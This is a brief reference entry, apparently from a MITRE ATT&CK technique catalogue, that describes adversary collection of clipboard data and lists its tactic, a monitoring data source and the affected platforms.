Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre